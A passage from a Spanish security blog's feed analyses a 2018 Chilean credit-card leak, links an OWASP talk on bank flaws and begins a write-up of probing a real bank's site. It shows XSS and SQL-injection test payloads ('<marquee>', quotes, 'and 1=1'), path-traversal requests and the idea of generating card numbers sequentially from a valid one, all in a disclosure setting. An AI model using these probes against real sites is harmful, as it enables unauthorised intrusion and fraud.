Este comportamiento está tan arraigado en la cultura de los bancos que cuando suceden estos robos no se notifican, el protocolo es que pasen lo más desapercibidos posibles. Esto se debe a que el costo de implementar seguridad - y por ende disminuir el volumen de transacciones realizadas - es mayor que el costo de afrontar el pago de seguros asociados al robo de dinero de tarjetas de crédito. En la filtración que les hablaré a continuación, ninguno de los bancos afectados le notificó a la PDI (policía de investigaciones de Chile) lo sucedido [&lt;a href="https://www.fayerwayer.com/2018/07/filtracion-tarjetas-banco-de-chile/" target="_blank"&gt;9&lt;/a&gt;].&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Análisis de las 14 mil tarjetas de créditos filtradas&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Lo primero que hay que notar es que la gran mayoría de las tarjetas de crédito ya habían expirado, lo segundo es que los bancos notificaron que el 90% de las tarjetas ya no eran funcionales, por lo cual estamos hablando de un &lt;i&gt;dump&lt;/i&gt; basura (se gasta más verificando los datos que obteniendo dinero).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Segundo podemos notar que los nombres no fueron sacados de una base de datos única, más bien los fueron anotando a mano&amp;nbsp; (mayúsculas, minúsculas, banco, nombre, tipo de cuenta, no existe un formato relacional) a medida que obtenían los datos.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilPOTS_PzdS007rcAHxaTkbFNGk4beEVlz3LgE9Z3dasNLfJSH7PYlIOf7YSBH4bW1UaJvPCtilC5kwxHWNiJJIq6JrP3G13oMUHmSz76iqWuhGRVQM1hNnvpdBX1g80-sw-hWcSLGVSIE/s1600/dump_01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="244" data-original-width="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilPOTS_PzdS007rcAHxaTkbFNGk4beEVlz3LgE9Z3dasNLfJSH7PYlIOf7YSBH4bW1UaJvPCtilC5kwxHWNiJJIq6JrP3G13oMUHmSz76iqWuhGRVQM1hNnvpdBX1g80-sw-hWcSLGVSIE/s1600/dump_01.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Lo tercero es que podemos notar que hicieron un esfuerzo por "desordenar" la base de datos, pero si la ordenas por número te tarjetas de crédito, nos damos cuenta que las cuentas fueron generadas secuencialemente, esto se logra teniendo como base una cuenta válida y cambiándole los último 5 dígitos secuencialmente o aleatoriamente, es muy probable encontrar más números cercanos válidos.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0m08OGlB3v0WlZs_ZHmlCguC5Z6qkzcm_cZBiMNSxsUuV8Yka_GKizrPb0BlKZiFEUsHQtB8U40dI4fVAkDBg-ZlZKXyEBJcWH09snLLeTVrhTA6AB3lAOBLH_KyysoAK3Kh3LEd118mH/s1600/dump_02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="721" data-original-width="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0m08OGlB3v0WlZs_ZHmlCguC5Z6qkzcm_cZBiMNSxsUuV8Yka_GKizrPb0BlKZiFEUsHQtB8U40dI4fVAkDBg-ZlZKXyEBJcWH09snLLeTVrhTA6AB3lAOBLH_KyysoAK3Kh3LEd118mH/s1600/dump_02.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En resumen como podemos ver, esta fue una base de datos que se obtuvo de varias fuentes, muchas se obtuvieron generándolas a partir de otras válidas y verificando los datos. Pero fue hecha 100% a mano, sin técnicas avanzadas de informática o "hackeo".&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Base de datos obsoleta y distracción&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Es evidente que los delincuentes que filtraron la base de datos &lt;b&gt;NO&lt;/b&gt; son el grupo de hackers "&lt;b&gt;&lt;i&gt;ShadowBrokers&lt;/i&gt;&lt;/b&gt;"[&lt;a href="https://www.nytimes.com/2017/11/12/us/nsa-shadow-brokers.html" target="_blank"&gt;10&lt;/a&gt;] que se infiltraron en la NSA y lograron obtener información y herramientas de hacking. Son simplemente &lt;i&gt;carders&lt;/i&gt;, personas que de oficio compran y venden datos de tarjetas de créditos, y aprovecharon el ambiente de inseguridad informática bancaria que se vive en Chile para hacerle daño a la banca.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La base de datos filtrada se considera basura o de muy poco valor, y cuando tu base de datos pierde valor ya que las cuentas ya están expiradas, lo que haces es liberarla como si fuera una parte de una gran base de datos, ofreciendo la base de datos "real" por dinero.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Piden 200 BTC por la base de datos completa y las herramientas que usaron para crearla... esos BTCs al día de hoy son 1,6 millones de dólares, un precio ridículamente alto que hace notar que no existe dicha base de datos "completa".&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El nombre &lt;b&gt;&lt;i&gt;ShadowBrokers&lt;/i&gt;&lt;/b&gt; lo eligieron con la finalidad de "distraer" a los investigadores y hacerles creer que son un súper grupo de hackers internacionales, cuando en la realidad deben ser&amp;nbsp; chilenos o de la región y con muy poco conocimiento informático (ya que si lo tuvieran habrían pedido Monero y no BTC).&amp;nbsp; Por último y otra distracción, piden la liberación de 3 tipos que no existen, nada concuerda en su discurso.&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Prensa&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="text-align: justify;"&gt;
El afamado grupo de hackers profesionales que se infiltró en la NSA y 
robó con técnicas avanzadas sus más preciados secretos y 0days, han 
vuelto a atacar y esta vez decidieron hacerlo en Chile, hackeando a todos los bancos y obteniendo sus tarjetas de crédito, filtrándolas para destruir el 
sistema bancario chileno al más puro estilo &lt;i&gt;Mr Robot&lt;/i&gt;.&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Prácticamente así es como la prensa en Chile informa sobre este filtración, siempre me da un poco de vergüenza lo sensacionalistas y poco informados que son los medios al momento de informar. Se nota que no le preguntan a nadie que sepa un poco de informática antes de escribir tanta desinformación, generando caos y pánico público.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Usan el término "&lt;i&gt;hacker&lt;/i&gt;" como sinónimo de delincuente informático, a pesar de que no se haya usado nada informático en el proceso, por ejemplo en una noticia donde un delincuente estafa a personas por internet, lo llaman "&lt;i&gt;hacker&lt;/i&gt; de alto conocimiento informático" y lo único que hace en la realidad es poner mensajes en Facebook ofreciendo propiedades que no son de él.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por último en un canal de televisión local apareció un "experto" en seguridad informática explicando que el ataque fue perpetrado por los mismos que hackearon la NSA y que realizaron el "&lt;i&gt;wannacry&lt;/i&gt;", que vergüenza.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Artículos anteriores&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="https://www.blackploit.com/2018/04/hackeando-un-banco-caso-real-xss.html" target="_blank"&gt;Hackeando un Banco (Caso Real) [XSS + Sensitive Data Exposure + explicación SQLi]&lt;/a&gt; (16 abr. 2018)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackploit.com/2018/04/hackeando-un-banco-2-caso-real.html" target="_blank"&gt;Hackeando un Banco 2 (Caso Real) [Transferir Dinero + Comprar Gratis]&lt;/a&gt; (26 abr. 2018)&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Bibliografía&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="https://www.blackploit.com/2018/04/hackeando-un-banco-2-caso-real.html"&gt;https://www.blackploit.com/2018/04/hackeando-un-banco-2-caso-real.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.emol.com/noticias/Economia/2018/06/09/909234/Banco-de-Chile-confirma-que-ataque-informatico-de-mayo-robo-US-10-millones.html"&gt;http://www.emol.com/noticias/Economia/2018/06/09/909234/Banco-de-Chile-confirma-que-ataque-informatico-de-mayo-robo-US-10-millones.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.biobiochile.cl/especial/noticias/reportajes/reportajes-reportajes/2018/07/18/hackeo-interno-en-el-banco-de-chile-informatico-robo-475-millones-de-pesos-usando-su-pc.shtml"&gt;https://www.biobiochile.cl/especial/noticias/reportajes/reportajes-reportajes/2018/07/18/hackeo-interno-en-el-banco-de-chile-informatico-robo-475-millones-de-pesos-usando-su-pc.shtml&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/felipeharboe/status/1022290787655213056"&gt;https://twitter.com/felipeharboe/status/1022290787655213056&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.fayerwayer.com/2018/07/lista-bancos-hackeo-filtracion-tarjetas-credito/"&gt;https://www.fayerwayer.com/2018/07/lista-bancos-hackeo-filtracion-tarjetas-credito/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://en.wikipedia.org/wiki/Carding_(fraud)"&gt;https://en.wikipedia.org/wiki/Carding_(fraud)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.syswaregroup.com/resource-centre/case-studies/banking/credit-card-fraud/"&gt;https://www.syswaregroup.com/resource-centre/case-studies/banking/credit-card-fraud/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.bindb.com/bin-list.html"&gt;https://www.bindb.com/bin-list.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.fayerwayer.com/2018/07/filtracion-tarjetas-banco-de-chile/" target="_blank"&gt;https://www.fayerwayer.com/2018/07/filtracion-tarjetas-banco-de-chile/ &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.nytimes.com/2017/11/12/us/nsa-shadow-brokers.html"&gt;https://www.nytimes.com/2017/11/12/us/nsa-shadow-brokers.html&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
[+] Saludos&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhtNSadSnCRm-jKfqIo55Doon20e0SAZDYMWJ39c0ySDFvsj6WymSihI-FBkHfgMr9raTgCfALe_3DkO16RmtVjkBCJb3aCzoUmMi-KZktF1fBlYDLocFUqSUytyFX00izu43kEZQTOHkH/s72-c/title_cc.png" width="72"/></item><item><title>Hackeando un Banco 2 (Caso Real) [Transferir Dinero + Comprar Gratis]</title><link>http://www.blackploit.com/2018/04/hackeando-un-banco-2-caso-real.html</link><category>Seguridad</category><category>Seguridad Web</category><category>Sensitive Data Exposure</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Thu, 26 Apr 2018 18:46:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2957164002761767894</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipuzKNt8Tojqge8wELBla8xQpVlQ6vJhYAcBT3l90ZH8vxVm2xtTVs3uHsajWRodLKhxVfRT4J4JGrZnv1s60-BB6PfIsSoTXK0VQqUnJHq-OfUhAkubqIQI9VFCCT2DwUa2aPxzRtAqSv/s1600/banco_hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="443" data-original-width="799" height="354" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipuzKNt8Tojqge8wELBla8xQpVlQ6vJhYAcBT3l90ZH8vxVm2xtTVs3uHsajWRodLKhxVfRT4J4JGrZnv1s60-BB6PfIsSoTXK0VQqUnJHq-OfUhAkubqIQI9VFCCT2DwUa2aPxzRtAqSv/s640/banco_hacked.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
El día de ayer se realizó el &lt;a href="https://www.owasp.org/index.php/LatamTour2018#tab=CHILE" target="_blank"&gt;&lt;b&gt;LatamTour2018&lt;/b&gt;&lt;/a&gt; en Chile, y el investigador &lt;b&gt;Eduardo Riveros&lt;/b&gt; realizó una charla donde:&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="text-align: justify;"&gt;
Se analiza el caso real de un portal chileno, con serios fallos de seguridad. Dónde aún después de 6 meses de ser advertido, no logra corregir sus vulnerabilidades. Se describirá las recomendaciones para disminuir o eliminar los riesgos detectados.&lt;/div&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
La charla llamada &lt;b&gt;"&lt;a href="https://adderou.cl/presentacion-owasp-tus-compras-gratis/" target="_blank"&gt;Gran promo: Todas tus compras Gratis&lt;/a&gt;"&lt;/b&gt; habla sobre como fue posible :&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;Transferir dinero con autorizaciones modificadas para parecer "regalos".&lt;/li&gt;
&lt;li&gt;Pagar productos con el dinero de cualquier cliente del banco sin datos de autorización (usuario(RUT)/contraseña).&lt;/li&gt;
&lt;/ol&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Lo &lt;span data-dobid="hdw"&gt;anecdótico&lt;/span&gt; de la situación, es que el Banco afectado es exactamente el mismo del cual hablo en &lt;a href="https://www.blackploit.com/2018/04/hackeando-un-banco-caso-real-xss.html" target="_blank"&gt;&lt;b&gt;Hackeando un Banco (Caso Real)&lt;/b&gt;&lt;/a&gt;, y saca las mismas conclusiones con respecto a la falta de canales para notificar vulnerabilidades y la lentitud inexplicable para arreglarlos, sin duda preocupante.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Acá los dejo con la charla:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/HKbqKr6LePs" width="640"&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Las diapositivas:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;iframe height="450px" src="https://drive.google.com/file/d/1LAj9YmYFp2_p-gpVZ3V1nh6NAX2vnE4f/preview" width="100%"&gt;&lt;/iframe&gt;

&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Fuentes:&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://adderou.cl/presentacion-owasp-tus-compras-gratis/" target="_blank"&gt;Presentación OWASP: "Gran promo: Todas tus compras Gratis"&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.owasp.org/index.php/LatamTour2018" target="_blank"&gt;LatamTour2018 OWASP&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipuzKNt8Tojqge8wELBla8xQpVlQ6vJhYAcBT3l90ZH8vxVm2xtTVs3uHsajWRodLKhxVfRT4J4JGrZnv1s60-BB6PfIsSoTXK0VQqUnJHq-OfUhAkubqIQI9VFCCT2DwUa2aPxzRtAqSv/s72-c/banco_hacked.png" width="72"/></item><item><title>Hackeando un Banco (Caso Real) [XSS + Sensitive Data Exposure + explicación SQLi]</title><link>http://www.blackploit.com/2018/04/hackeando-un-banco-caso-real-xss.html</link><category>Seguridad</category><category>Seguridad Web</category><category>Sensitive Data Exposure</category><category>SQLi</category><category>Tips</category><category>XSS</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Mon, 16 Apr 2018 10:23:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-3391355119819979582</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl2I1GmakJYZopMi2ZoIcdK-X3JA0f4sOCvv_HAOaJbrpU8tJpIRvoA8LKjLeW-rywEOgf8HiaufBWSVaqxzH7ImdAPTqrgCuA3_JMDxLEVHrXEOxQwaEXIlXgc-uvulus6BERkHr82ME1/s1600/bank_hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="500" data-original-width="1100" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl2I1GmakJYZopMi2ZoIcdK-X3JA0f4sOCvv_HAOaJbrpU8tJpIRvoA8LKjLeW-rywEOgf8HiaufBWSVaqxzH7ImdAPTqrgCuA3_JMDxLEVHrXEOxQwaEXIlXgc-uvulus6BERkHr82ME1/s640/bank_hacked.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;Hace tiempo que no escribo, pero ahora amerita la ocasión... Estoy acostumbrado a escribir reportes de seguridad de las vulnerabilidades que encuentro en los sitios webs que visito, para mandárselo al encargado del sitio o webmaster. Normalmente cuando se encuentra un bug, es muy probable que se encuentren muchos más ya que en la mayoría de casos los errores los encuentro poniendo un "&amp;lt;marquee&amp;gt;" o una comilla simple&amp;nbsp; en cualquier parámetro &lt;i&gt;&lt;b&gt;GET&lt;/b&gt;&lt;/i&gt; o &lt;i&gt;&lt;b&gt;POST&lt;/b&gt;&lt;/i&gt; que encuentre. &lt;b&gt;Ejemplo:&lt;/b&gt;&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;http://www.sitio.com/index.php?id=1&amp;lt;marquee&amp;gt;
http://www.sitio.com/index.php?id=1'
&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;Como ya muchos sabrán el primero es para encontrar &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" target="_blank"&gt;&lt;b&gt;XSS&lt;/b&gt;&lt;/a&gt; y el segundo para encontrar &lt;a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank"&gt;&lt;b&gt;SQLi&lt;/b&gt;&lt;/a&gt;, pero también sirven para encontrar &lt;a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion" target="_blank"&gt;&lt;b&gt;LFI&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion" target="_blank"&gt;&lt;b&gt;Remote File Inclusion&lt;/b&gt;&lt;/a&gt;,&amp;nbsp; &lt;a href="https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)" target="_blank"&gt;&lt;b&gt;Directory file include&lt;/b&gt;&lt;/a&gt;, &lt;b&gt;&lt;a href="https://www.owasp.org/index.php/Code_Injection" target="_blank"&gt;inyección de código&lt;/a&gt;, &lt;a href="https://www.owasp.org/index.php/Command_Injection" target="_blank"&gt;inyección de comandos&lt;/a&gt;&lt;/b&gt;... Existen muchos tipos de vulnerabilidades que se pueden encontrar con una simple comilla o un carácter no alfanumérico.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;En el primer caso (&lt;b&gt;&lt;i&gt; ?id=1&amp;lt;marquee&amp;gt;&lt;/i&gt;&lt;/b&gt; ) si la página se mueve es vulnerable a XSS, si en algún campo de la web aparece &amp;lt;marquee&amp;gt; todavía es vulnerable a XSS pero hay que buscar algún bypass y eso es aburrido y tedioso.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;En el segundo caso ( &lt;i&gt;&lt;b&gt;?id=1' &lt;/b&gt;&lt;/i&gt;), solo voy a explicar el caso del &lt;b&gt;SQLi&lt;/b&gt; ya que no es la finalidad de este post explicar en detalle todos los tipos de ataques, esta es solo la introducción de a lo que quiero llegar... Pues bueno, si al poner la comilla simple lanza un &lt;i&gt;Error 404 (Not Found)&lt;/i&gt; probablemente el sitio no sea vulnerable a SQLi, pero si te encuentras con un error del tipo:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;pre&gt;&lt;code&gt;You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\'' at line 1&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;Significa que es &lt;b&gt;vulnerable a SQLi&lt;/b&gt;, si no aparece ese mensaje, pero el servidor responde un &lt;i&gt;Error 500 (Internal Server Error)&lt;/i&gt; o no responde nada (la página queda en blanco o no muestra resultados) hay que remplazar la comilla por un &lt;i&gt;&lt;b&gt;and 1=1&lt;/b&gt;&lt;/i&gt; y por un &lt;i&gt;&lt;b&gt;and 1=2&lt;/b&gt;&lt;/i&gt; &lt;b&gt;Ejemplo:&lt;/b&gt;&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;http://www.sitio.com/index.php?id=1 and 1=1
http://www.sitio.com/index.php?id=1 and 1=2&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&amp;nbsp;Si en el primer caso el contenido aparece bien, igual que sin el &lt;i&gt;&lt;b&gt;and 1=1&lt;/b&gt;&lt;/i&gt;, y en el segundo caso no aparece nada, significa que es &lt;b&gt;vulnerable a &lt;a href="https://www.owasp.org/index.php/Inyecci%C3%B3n_SQL_Ciega" target="_blank"&gt;Blind SQLi&lt;/a&gt;&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;Como ven, con simples 2 o 3 pasos que verifiques cada vez que visites una web y veas algún &lt;i&gt;&lt;b&gt;?parameter=value &lt;/b&gt;&lt;/i&gt;en la bara de direcciones, puedes encontrar muchos sitios webs vulnerables a diferentes tipos de ataques como los descritos arriba. (&lt;b&gt;*Nota:&lt;/b&gt; muchos parámetros están embellecidos como rutas, por ende también puedes encontrar parámetros GET que se pasan con el formato &lt;i&gt;&lt;b&gt;/parameter/value&lt;/b&gt;&lt;/i&gt;)&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;Es en esa rutina de poner comillas me encuentro con que en el sitio web de un importante Banco, donde pongo una comilla en un parámetro &lt;i&gt;&lt;b&gt;script.aspx?Id=12'&lt;/b&gt;&lt;/i&gt;&amp;nbsp; y encuentro un error que filtra mucha información del servidor donde se aloja:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqMT4MCDsMuImmqX20DW6504YQPb49HWhgfbcRHSJWCZyXYQX58jc0lkeN-Z3XrgASuBgdCMGfuZnsCXRDoknjoQaeDlNnD9qO_C1zJtMItfa6WaQepVb0gCA_sr5LGtn5vSeAbSrP3FMq/s1600/1_error.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="872" data-original-width="981" height="568" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqMT4MCDsMuImmqX20DW6504YQPb49HWhgfbcRHSJWCZyXYQX58jc0lkeN-Z3XrgASuBgdCMGfuZnsCXRDoknjoQaeDlNnD9qO_C1zJtMItfa6WaQepVb0gCA_sr5LGtn5vSeAbSrP3FMq/s640/1_error.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;Esta es una vulnerabilidad llamada &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure" target="_blank"&gt;&lt;b&gt;Sensitive Data Exposure&lt;/b&gt;&lt;/a&gt;, el problema radica en que está activado el modo debug o modo 
desarrollador, por lo tanto se puede ver un útil reporte del error para 
los desarrolladores, pero que muestra demasiada información a terceros.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Datos obtenidos:&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;Sistema operativo del servidor. &lt;/li&gt;
&lt;li&gt;&amp;nbsp;Versión .NET Microsoft Framework.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Versión ASP.NET.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Ruta absoluta del proyecto en el servidor.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Extractos de código múltiple errores y logs. &lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;A primera vista no pareciera ser una vulnerabilidad seria, pero un hacker puede usar esta información para buscar la aplicación y su versión en repositorios de vulnerabilidades y exploits, para verificar si existe algún exploit listo para descargar, ejecutar y tomar el sistema. Por otro lado, solo le damos más información a un atacante para que busque vulnerabilidades más serias en el resto de las rutas y logs filtrados.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;Por suerte para el Banco al intentar inyectar código no se puede ya que las parámetros son &lt;i&gt;saneados&lt;/i&gt; (a los valores se les quita algunos caracteres famosos por ser usados para inyectar código como por ejemplo &lt;b&gt;' &amp;lt; &amp;gt;&lt;/b&gt;), pero aun así se pueden inducir diferentes errores: &lt;/div&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://www.banco.xxx/ruta/script.aspx?Id=58l
Error: Could not find a part of the path "C:\ruta\home58l\link.inc".

https://www.banco.xxx/ruta/script.aspx?Id=58:1
Error: Invalid path for MapPath '/ruta/home58:1//link.inc'. A virtual path is expected.

https://www.banco.xxx/ruta/script.aspx?Id=58"l
Error: Illegal characters in path.&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&amp;nbsp;También se puede inyectar la ruta de otra carpeta, pero por suerte para el Banco, a la consulta se le concatena el nombre de un archivo que debe existir dentro de la carpeta, así que solo se puede ver contenido de carpetas con el archivo concatenado en la consulta.&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://www.banco.xxx/ruta/script.aspx?Id=58/../carpeta59/
200 OK!&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&amp;nbsp;Por mi falta de conocimiento en ASP y NET es que me rindo de intentar buscar más formas de vulnerar el sistema, y como dije antes, si encuentras una vulnerabilidad, es posible que encuentres muchas más... Es así como encuentro un XSS:&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://www.banco.xxx/ruta/script.aspx?Id=58&amp;lt;marquee&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;marquee&gt;&amp;nbsp;Se mueve todo así que es vulnerable a XSS, ahora pruebo con una imagen:&lt;/marquee&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
